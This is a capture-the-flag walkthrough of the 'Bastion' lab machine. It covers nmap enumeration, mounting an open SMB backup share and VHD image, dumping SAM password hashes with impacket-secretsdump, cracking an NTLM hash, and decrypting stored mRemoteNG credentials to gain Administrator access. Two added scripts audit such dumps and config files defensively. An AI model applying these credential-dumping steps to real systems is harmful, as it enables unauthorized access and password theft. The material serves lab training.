# Bastion (Easy)

## Enumeration

### Nmap

```
nmap -sC -sV -oA nmap/10.10.10.134 10.10.10.134
```

```
Nmap scan report for 10.10.10.134
Host is up (0.12s latency).
Not shown: 996 closed ports
PORT    STATE SERVICE      VERSION
22/tcp  open  ssh          OpenSSH for_Windows_7.9 (protocol 2.0)
| ssh-hostkey: 
|   2048 3a:56:ae:75:3c:78:0e:c8:56:4d:cb:1c:22:bf:45:8a (RSA)
|   256 cc:2e:56:ab:19:97:d5:bb:03:fb:82:cd:63:da:68:01 (ECDSA)
|_  256 93:5f:5d:aa:ca:9f:53:e7:f2:82:e6:64:a8:a3:a0:18 (ED25519)
135/tcp open  msrpc        Microsoft Windows RPC
139/tcp open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp open  microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: -39m57s, deviation: 1h09m16s, median: 1s
| smb-os-discovery: 
|   OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
|   Computer name: Bastion
|   NetBIOS computer name: BASTION\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2021-07-12T18:00:27+02:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2021-07-12T16:00:28
|_  start_date: 2021-07-12T08:13:18

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Jul 12 12:00:35 2021 -- 1 IP address (1 host up) scanned in 33.68 seconds
```

The SMB port (445) is open, so we enumerate that next.

### SMB

![](/files/-MfwCWNK9uqpIPHWNY_d)

We can see there is a `Backups` share.

![](/files/-MfwCrvaAfn7ItaebzIt)

After some digging, we found two VHD files. They are too big to download and analyse locally.

![](/files/-MfwDGeRk1-nux_KeWnj)

Instead, we can use the `mount` command to mount the share on our machine.

```
# Create the mount point (needs root under /mnt), then mount the Backups share over CIFS
sudo mkdir -p /mnt/backups
sudo mount -t cifs //10.10.10.134/Backups /mnt/backups
```

![](/files/-MfwExupXp7NzBz65tLs)

After that, we can use the `guestmount` command to mount the 5 GB VHD file read-only from inside the mounted share.

```
guestmount --add /mnt/backups/WindowsImageBackup/L4mpje-PC/Backup\ 2019-02-22\ 124351/9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd --inspector --ro /mnt/vhd -v
```

![](/files/-MfwFIf-nIC5lEdgk4DP)

![](/files/-MfwFpQA-jx1Is2rBJ_D)

The VHD file is mounted!

After that, I searched for passwords but found nothing. A forum hint pointed us to the System32 directory.

![](/files/-MfwGlHc56SNjX67p7Tv)

We are able to read the SAM and SYSTEM files. We copy both files to our local machine and then dump the password hashes from them with Impacket's `secretsdump`.

```
impacket-secretsdump -sam SAM -system SYSTEM local
```

![](/files/-MfwHf-r7hVf9oidk9af)

The dump shows several hashes.

Those are LM and NTLM hashes.

I tried cracking each part of the hash with CrackStation.

In the end, the NTLM hash of user `L4mpje` gave us the password.

![](/files/-MfwIGBp8M9qpGCxEgtZ)
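To make the LM/NTLM split above concrete, here is an added example (not part of the original write-up) that parses `secretsdump`-style lines and reports what a defender would care about: stored LM hashes, empty NT hashes, and accounts sharing an NT hash. The sample accounts and all non-empty hash values are constructed, and the issue labels are this example's own names.

```python
import re
from collections import defaultdict

# Well-known hashes of the empty string; this LM value means no LM hash is stored.
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"

# secretsdump prints local SAM entries as user:rid:lmhash:nthash:::
ENTRY = re.compile(r"^([^:]+):(\d+):([0-9a-fA-F]{32}):([0-9a-fA-F]{32}):::$")

# Constructed sample output; every non-empty hash below is made up.
SAMPLE = """\
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
svc_backup:1000:aad3b435b51404eeaad3b435b51404ee:0123456789abcdef0123456789abcdef:::
legacy:1001:00112233445566778899aabbccddeeff:0123456789abcdef0123456789abcdef:::
"""


def parse_sam_dump(text):
    """Return one dict per account line, skipping banners and blank lines."""
    accounts = []
    for line in text.splitlines():
        m = ENTRY.match(line.strip())
        if m:
            user, rid, lm, nt = m.groups()
            accounts.append({"user": user, "rid": int(rid), "lm": lm.lower(), "nt": nt.lower()})
    return accounts


def findings(accounts):
    """Return (user, issue) pairs worth fixing on the host the dump came from."""
    issues, by_nt = [], defaultdict(list)
    for a in accounts:
        if a["lm"] != EMPTY_LM:
            issues.append((a["user"], "lm-hash-stored"))  # LM is weak; disable LM storage
        if a["nt"] == EMPTY_NT:
            issues.append((a["user"], "empty-nt-hash"))   # blank or never-set password
        else:
            by_nt[a["nt"]].append(a["user"])
    # NT hashes are unsalted: equal hashes mean equal passwords, and lookup tables work.
    for users in by_nt.values():
        if len(users) > 1:
            issues.extend((u, "nt-hash-shared") for u in users)
    return issues


if __name__ == "__main__":
    for user, issue in findings(parse_sam_dump(SAMPLE)):
        print(f"{user}: {issue}")
```
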

Then we can log in as user `L4mpje` over SSH, since port 22 is open.

## User

![](/files/-MfwIvKA9bGz6YGCZe_t)

![](/files/-MfwJ8X9wG3E170vHYlz)

## Privilege Escalation

After some enumeration, we can see that mRemoteNG is installed here.

![](/files/-MfwK5N5fZQ9gNrQIOBe)

From this [article](https://ethicalhackingguru.com/how-to-exploit-remote-connection-managers/), we learn that it stores credentials inside **confCons.xml**.

![](/files/-MfwKbUUcxneB_4Qsm3n)

We can see the administrator hash here.
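From the defender's side, the same file can be audited for saved credentials. The following is an added example (not from the original write-up or the mRemoteNG project) that lists every connection in a `confCons.xml` with a stored password and reports the file-level protection settings. The attribute names follow the confCons.xml layout as I know it; the sample document, hosts and placeholder values are constructed.

```python
import xml.etree.ElementTree as ET

# Constructed sample in the confCons.xml layout. Hosts are documentation addresses and
# the Protected/Password values are placeholders, not real mRemoteNG ciphertext.
SAMPLE = """\
<mrng:Connections xmlns:mrng="http://mremoteng.org" Name="Connections"
    EncryptionEngine="AES" BlockCipherMode="GCM" KdfIterations="1000"
    FullFileEncryption="false" Protected="CONSTRUCTED-PLACEHOLDER" ConfVersion="2.6">
  <Node Name="DC" Type="Connection" Username="Administrator"
        Password="CONSTRUCTED-PLACEHOLDER" Hostname="192.0.2.10" Protocol="RDP" />
  <Node Name="Lab" Type="Container">
    <Node Name="web01" Type="Connection" Username="deploy" Password=""
          Hostname="192.0.2.20" Protocol="SSH2" />
  </Node>
</mrng:Connections>
"""


def audit_confcons(xml_text):
    """Summarise what a confCons.xml exposes to anyone who can read the file."""
    root = ET.fromstring(xml_text)
    stored = []
    for node in root.iter("Node"):  # Node elements are not namespaced; iter() also walks containers
        if node.get("Type") == "Connection" and node.get("Password"):
            stored.append({
                "name": node.get("Name"),
                "host": node.get("Hostname"),
                "user": node.get("Username"),
                "protocol": node.get("Protocol"),
            })
    return {
        # "false" leaves hostnames and usernames readable; only Password values are encrypted
        "full_file_encryption": root.get("FullFileEncryption", "false").lower() == "true",
        "kdf_iterations": int(root.get("KdfIterations", "0")),
        "stored_credentials": stored,
    }


if __name__ == "__main__":
    report = audit_confcons(SAMPLE)
    print("full file encryption:", report["full_file_encryption"])
    print("KDF iterations:", report["kdf_iterations"])
    for cred in report["stored_credentials"]:
        print(f'{cred["name"]}: {cred["user"]}@{cred["host"]} ({cred["protocol"]})')
```

Any entry in `stored_credentials` means the file is a credential store: restrict who can read it, set a custom master password in mRemoteNG, and avoid saving privileged accounts such as Administrator in it.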

We can also find a script to decrypt the hash on GitHub [here](https://github.com/haseebT/mRemoteNG-Decrypt).

![](/files/-MfwKziMRJ2pTomDr0T2)

After decrypting it, we get the password and can SSH in as Administrator.

![](/files/-MfwL8Yr4lBdXZ1nor96)

Got root!

![](/files/-MfwLL8pxo9LONjr_SBO)

